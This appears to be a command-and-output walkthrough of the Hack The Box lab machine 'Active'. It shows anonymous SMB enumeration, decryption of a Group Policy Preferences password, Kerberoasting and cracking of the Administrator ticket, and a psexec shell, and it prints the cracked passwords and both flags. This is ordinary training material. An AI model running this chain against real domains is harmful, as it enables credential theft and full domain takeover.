Active
Thu, 19 September 2024
Platform: Hack The Box
sudo nmap 10.10.10.82 -sV -Pn -r -g53 -D 1.1.1.1 -p- --min-rate=3000 -sC
Nmap scan report for 10.10.10.100
Host is up (0.055s latency).
Not shown: 65513 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-19 11:00:31Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
49166/tcp open msrpc Microsoft Windows RPC
49173/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-09-19T11:01:28
|_ start_date: 2024-09-19T10:58:10
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.88 seconds
enum4linux 10.10.10.100
===================================( Session Check on 10.10.10.100 )===================================
[+] Server 10.10.10.100 allows sessions using username '', password ''
=================================( Share Enumeration on 10.10.10.100 )=================================
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.10.10.100
//10.10.10.100/ADMIN$ Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.100/C$ Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.100/IPC$ Mapping: OK Listing: DENIED Writing: N/A
//10.10.10.100/NETLOGON Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.100/Replication Mapping: OK Listing: OK Writing: N/A
//10.10.10.100/SYSVOL Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.100/Users Mapping: DENIED Listing: N/A Writing: N/A
crackmapexec smb 10.10.10.100 -u '' -p '' --shares
SMB 10.10.10.100 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\:
SMB 10.10.10.100 445 DC [+] Enumerated shares
SMB 10.10.10.100 445 DC Share Permissions Remark
SMB 10.10.10.100 445 DC ----- ----------- ------
SMB 10.10.10.100 445 DC ADMIN$ Remote Admin
SMB 10.10.10.100 445 DC C$ Default share
SMB 10.10.10.100 445 DC IPC$ Remote IPC
SMB 10.10.10.100 445 DC NETLOGON Logon server share
SMB 10.10.10.100 445 DC Replication READ
SMB 10.10.10.100 445 DC SYSVOL Logon server share
SMB 10.10.10.100 445 DC Users
impacket-smbclient 10.10.10.100
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Type help for list of commands
# tree
[-] No share selected
# shares
ADMIN$
C$
IPC$
NETLOGON
Replication
SYSVOL
Users
# use Replication
# tree
/active.htb/DfsrPrivate
/active.htb/Policies
/active.htb/scripts
/active.htb/DfsrPrivate/ConflictAndDeleted
/active.htb/DfsrPrivate/Deleted
/active.htb/DfsrPrivate/Installing
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}
/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/USER
/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI
/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE
/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/USER
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol
/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups
/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
# cat /active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
active.htb\SVC_TGS
edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
GPPstillStandingStrong2k18
SVC_TGS:GPPstillStandingStrong2k18
crackmapexec smb 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --users
SMB 10.10.10.100 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
SMB 10.10.10.100 445 DC [+] Enumerated domain user(s)
SMB 10.10.10.100 445 DC active.htb\SVC_TGS badpwdcount: 0 desc:
SMB 10.10.10.100 445 DC active.htb\krbtgt badpwdcount: 0 desc: Key Distribution Center Service Account
SMB 10.10.10.100 445 DC active.htb\Guest badpwdcount: 0 desc: Built-in account for guest access to the computer/domain
SMB 10.10.10.100 445 DC active.htb\Administrator badpwdcount: 0 desc: Built-in account for administering the computer/domain
crackmapexec smb 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --shares
SMB 10.10.10.100 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
SMB 10.10.10.100 445 DC [+] Enumerated shares
SMB 10.10.10.100 445 DC Share Permissions Remark
SMB 10.10.10.100 445 DC ----- ----------- ------
SMB 10.10.10.100 445 DC ADMIN$ Remote Admin
SMB 10.10.10.100 445 DC C$ Default share
SMB 10.10.10.100 445 DC IPC$ Remote IPC
SMB 10.10.10.100 445 DC NETLOGON READ Logon server share
SMB 10.10.10.100 445 DC Replication READ
SMB 10.10.10.100 445 DC SYSVOL READ Logon server share
SMB 10.10.10.100 445 DC Users READ
impacket-smbclient SVC_TGS@10.10.10.100
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
Replication
SYSVOL
Users
# use Users
# tree
/desktop.ini
/Default/AppData
/Default/Application Data
/Default/Cookies
/Default/Desktop
/Default/Documents
/Default/Downloads
/Default/Favorites
/Default/Links
/Default/Local Settings
/Default/Music
/Default/My Documents
/Default/NetHood
/Default/NTUSER.DAT
/Default/NTUSER.DAT.LOG
/Default/NTUSER.DAT.LOG1
/Default/NTUSER.DAT.LOG2
/Default/NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
/Default/NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
/Default/NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
/Default/Pictures
/Default/PrintHood
/Default/Recent
/Default/Saved Games
/Default/SendTo
/Default/Start Menu
/Default/Templates
/Default/Videos
/SVC_TGS/Contacts
/SVC_TGS/Desktop
/SVC_TGS/Downloads
/SVC_TGS/Favorites
/SVC_TGS/Links
/SVC_TGS/My Documents
/SVC_TGS/My Music
/SVC_TGS/My Pictures
/SVC_TGS/My Videos
/SVC_TGS/Saved Games
/SVC_TGS/Searches
/Default/AppData/Local
/Default/AppData/Roaming
/Default/Documents/My Music
/Default/Documents/My Pictures
/Default/Documents/My Videos
/SVC_TGS/Desktop/user.txt
/Default/AppData/Local/Application Data
/Default/AppData/Local/History
/Default/AppData/Local/Microsoft
/Default/AppData/Local/Temp
/Default/AppData/Local/Temporary Internet Files
/Default/AppData/Roaming/Microsoft
/Default/AppData/Local/Microsoft/Windows
/Default/AppData/Roaming/Microsoft/Internet Explorer
/Default/AppData/Roaming/Microsoft/Windows
/Default/AppData/Local/Microsoft/Windows/GameExplorer
/Default/AppData/Local/Microsoft/Windows/History
/Default/AppData/Local/Microsoft/Windows/Temporary Internet Files
/Default/AppData/Roaming/Microsoft/Internet Explorer/Quick Launch
/Default/AppData/Roaming/Microsoft/Windows/Cookies
/Default/AppData/Roaming/Microsoft/Windows/Network Shortcuts
/Default/AppData/Roaming/Microsoft/Windows/Printer Shortcuts
/Default/AppData/Roaming/Microsoft/Windows/Recent
/Default/AppData/Roaming/Microsoft/Windows/SendTo
/Default/AppData/Roaming/Microsoft/Windows/Start Menu
/Default/AppData/Roaming/Microsoft/Windows/Templates
/Default/AppData/Roaming/Microsoft/Internet Explorer/Quick Launch/desktop.ini
/Default/AppData/Roaming/Microsoft/Internet Explorer/Quick Launch/Server Manager.lnk
/Default/AppData/Roaming/Microsoft/Internet Explorer/Quick Launch/Shows Desktop.lnk
/Default/AppData/Roaming/Microsoft/Internet Explorer/Quick Launch/Window Switcher.lnk
/Default/AppData/Roaming/Microsoft/Windows/SendTo/Compressed (zipped) Folder.ZFSendToTarget
/Default/AppData/Roaming/Microsoft/Windows/SendTo/Desktop (create shortcut).DeskLink
/Default/AppData/Roaming/Microsoft/Windows/SendTo/Desktop.ini
/Default/AppData/Roaming/Microsoft/Windows/SendTo/Mail Recipient.MAPIMail
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Maintenance
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Accessibility
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Command Prompt.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Desktop.ini
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Notepad.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Run.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/System Tools
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Windows Explorer.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Maintenance/Desktop.ini
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Maintenance/Help.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Accessibility/Desktop.ini
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Accessibility/Ease of Access.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Accessibility/Magnify.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Accessibility/Narrator.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Accessibility/On-Screen Keyboard.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/System Tools/computer.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/System Tools/Control Panel.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/System Tools/Desktop.ini
# cat /SVC_TGS/Desktop/user.txt
d9439cca3b01ff38f9612e1fb7735c6c
impacket-GetUserSPNs -target-domain active.htb -request active.htb/SVC_TGS
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 20:06:40.351723 2024-09-19 11:59:20.995759
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$c4e8188d877bf7955a2e3406294b887b$46faa724fb5ac9e0c659616b852136695f4588cfd805c099bfb0d4dc76b4ca8082156011932efc75ada622c248d307e38f1bdb0d4994a7347ba6669e333e98a20c71c859a78d27ca370e8d9ba540598bc0d40cacdef919478c926be4b470a2b438caad3328f78f84c9fddf9455d00ee914fed64164b9c6a96ec04605fb4c1a1a4b62a4605d45e0488032a5fba87bb83e3de0afd989d5d774257b85962c7aaf97d13998f51954139aed2de0300f55796d1ebf070bb79405d7d58af521eef01aae575145887ada425f7f4b0bb9a2e9f7b57cd8ee5613ea0edd22f2f2dd11d1d2598239fa82d70e4fe692b7f99b36b4258c6fbfb5117416d956b2bc3abc0ef77bdfaa4535560b2b711612ae2785456a0fa746132fa6f7e6e21e611eac5a16e1579bf6228df16dbbd081cc9aba7eb0b1f554347d8e5e846aabaf2c4043850de0aea619abd5fc0428087e7695b29c415eca2b905bb04c32bdb0af1fb99a4049bb6f5b3c93e9cba8a54450a1082c36eb32e7351deec1c197a84db9c705962af087eee977567e1dca21bc66884cefa2f99f8140c7f1e760f9527ca822b3ca1ddf050917aebd175f76714bcabd0a3a3003bb7775fc52c555598252a25495f10eed4f0df169c7e0d2d51e9741db072ce5c46abc56786b09502e33bed93ba152cdf7fec47c729f2556da722b28407cc5894dfb2064f4f5c977b0e2d0355f1949200e7b6073c6e5d1728ebb3ac8822fbc759a19957144efda46b2cb9bc76b73a26649b3e431300ea31284981a1cca12b941e16d5646a92db4a26329ae799ccc5cc5f8ae9cfd17b0d5c61710a3de55736aa26c9a6b2d1846c2bc1194a68f8efbfa7f754018a81436aefa3f5b4b94afac5cb2ed80e9af76da1cdfe34b6e46ffc577d2dfe8d762585ee5abb0f6c98bddda2c87d9fa1e4732b252f65a8b017801887736c56e06f77b28d328fea281eb214997b9b4c0c9cb248d495993b06ab7a633ec43287697c17e5434878adc7c0dda4ec09065af55693e13c6724eec18b6c6217ee6a2a6e1971af2d426a19be61a20a60f461a01fe03b06f6aa651bef18587baadc2b175790805c4c5d29f43e80ad5366e77da89b922e70a0095ab4b05315c2ad6ce285ba3c4f1a83855828190d88c85ae9d1098a78670a2bdc1c730ab0db2ab33bfbee1c643e0c78069337ef9975afc60628b7c3dfc80f5aaf887d6573f4f679ce14f46850253bafd5b77987197ac21f187e44da1012b88fc384204a247ba80
echo '$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$c4e8188d877bf7955a2e3406294b887b$46faa724fb5ac9e0c659616b852136695f4588cfd805c099bfb0d4dc76b4ca8082156011932efc75ada622c248d307e38f1bdb0d4994a7347ba6669e333e98a20c71c859a78d27ca370e8d9ba540598bc0d40cacdef919478c926be4b470a2b438caad3328f78f84c9fddf9455d00ee914fed64164b9c6a96ec04605fb4c1a1a4b62a4605d45e0488032a5fba87bb83e3de0afd989d5d774257b85962c7aaf97d13998f51954139aed2de0300f55796d1ebf070bb79405d7d58af521eef01aae575145887ada425f7f4b0bb9a2e9f7b57cd8ee5613ea0edd22f2f2dd11d1d2598239fa82d70e4fe692b7f99b36b4258c6fbfb5117416d956b2bc3abc0ef77bdfaa4535560b2b711612ae2785456a0fa746132fa6f7e6e21e611eac5a16e1579bf6228df16dbbd081cc9aba7eb0b1f554347d8e5e846aabaf2c4043850de0aea619abd5fc0428087e7695b29c415eca2b905bb04c32bdb0af1fb99a4049bb6f5b3c93e9cba8a54450a1082c36eb32e7351deec1c197a84db9c705962af087eee977567e1dca21bc66884cefa2f99f8140c7f1e760f9527ca822b3ca1ddf050917aebd175f76714bcabd0a3a3003bb7775fc52c555598252a25495f10eed4f0df169c7e0d2d51e9741db072ce5c46abc56786b09502e33bed93ba152cdf7fec47c729f2556da722b28407cc5894dfb2064f4f5c977b0e2d0355f1949200e7b6073c6e5d1728ebb3ac8822fbc759a19957144efda46b2cb9bc76b73a26649b3e431300ea31284981a1cca12b941e16d5646a92db4a26329ae799ccc5cc5f8ae9cfd17b0d5c61710a3de55736aa26c9a6b2d1846c2bc1194a68f8efbfa7f754018a81436aefa3f5b4b94afac5cb2ed80e9af76da1cdfe34b6e46ffc577d2dfe8d762585ee5abb0f6c98bddda2c87d9fa1e4732b252f65a8b017801887736c56e06f77b28d328fea281eb214997b9b4c0c9cb248d495993b06ab7a633ec43287697c17e5434878adc7c0dda4ec09065af55693e13c6724eec18b6c6217ee6a2a6e1971af2d426a19be61a20a60f461a01fe03b06f6aa651bef18587baadc2b175790805c4c5d29f43e80ad5366e77da89b922e70a0095ab4b05315c2ad6ce285ba3c4f1a83855828190d88c85ae9d1098a78670a2bdc1c730ab0db2ab33bfbee1c643e0c78069337ef9975afc60628b7c3dfc80f5aaf887d6573f4f679ce14f46850253bafd5b77987197ac21f187e44da1012b88fc384204a247ba80' > hashes
john hashes -w=rockyou
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:04 DONE (2024-09-19 21:30) 0.2040g/s 2150Kp/s 2150Kc/s 2150KC/s Tiff1278..Thorne0
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Administrator:Ticketmaster1968
impacket-psexec Administrator@active.htb cmd.exe
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
[*] Requesting shares on active.htb.....
[*] Found writable share ADMIN$
[*] Uploading file slNKCUqT.exe
[*] Opening SVCManager on active.htb.....
[*] Creating service Wfie on active.htb.....
[*] Starting service Wfie.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> cd c:\users
c:\Users> dir
Volume in drive C has no label.
Volume Serial Number is 15BB-D59C
Directory of c:\Users
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
21/07/2018 05:39 �� <DIR>
cd C:\
C:\> chcp
Active code page: 737
impacket-psexec -codec cp737 Administrator@active.htb cmd.exe
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
[*] Requesting shares on active.htb.....
[*] Found writable share ADMIN$
[*] Uploading file eTlOQdUj.exe
[*] Opening SVCManager on active.htb.....
[*] Creating service zkon on active.htb.....
[*] Starting service zkon.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> cd c:\users
c:\Users> tree /F
Folder PATH listing
Volume serial number is 00000200 15BB:D59C
C:.
├───Administrator
│ ├───Contacts
│ ├───Desktop
│ │ root.txt
│ │
│ ├───Documents
│ ├───Downloads
│ ├───Favorites
│ │ ├───Links
│ │ │ Suggested Sites.url
│ │ │ Web Slice Gallery.url
│ │ │
│ │ ├───Microsoft Websites
│ │ │ IE Add-on site.url
│ │ │ IE site on Microsoft.com.url
│ │ │ Microsoft At Home.url
│ │ │ Microsoft At Work.url
│ │ │ Microsoft Store.url
│ │ │
│ │ ├───MSN Websites
│ │ │ MSN Autos.url
│ │ │ MSN Entertainment.url
│ │ │ MSN Money.url
│ │ │ MSN Sports.url
│ │ │ MSN.url
│ │ │ MSNBC News.url
│ │ │
│ │ └───Windows Live
│ │ Get Windows Live.url
│ │ Windows Live Gallery.url
│ │ Windows Live Mail.url
│ │ Windows Live Spaces.url
│ │
│ ├───Links
│ │ Desktop.lnk
│ │ Downloads.lnk
│ │ RecentPlaces.lnk
│ │
│ ├───Music
│ ├───Pictures
│ ├───Saved Games
│ ├───Searches
│ └───Videos
├───Public
│ ├───Documents
│ ├───Downloads
│ ├───Music
│ │ └───Sample Music
│ ├───Pictures
│ │ └───Sample Pictures
│ └───Videos
│ └───Sample Videos
└───SVC_TGS
├───Contacts
├───Desktop
│ user.txt
│
├───Downloads
├───Favorites
├───Links
├───My Documents
├───My Music
├───My Pictures
├───My Videos
├───Saved Games
└───Searches
c:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 15BB-D59C
Directory of c:\Users\Administrator\Desktop
21/01/2021 07:49 μμ <DIR> .
21/01/2021 07:49 μμ <DIR> ..
19/09/2024 01:59 μμ 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 1.137.692.672 bytes free
c:\Users\Administrator\Desktop> type root.txt
18549eb771131962a74088e12b548caa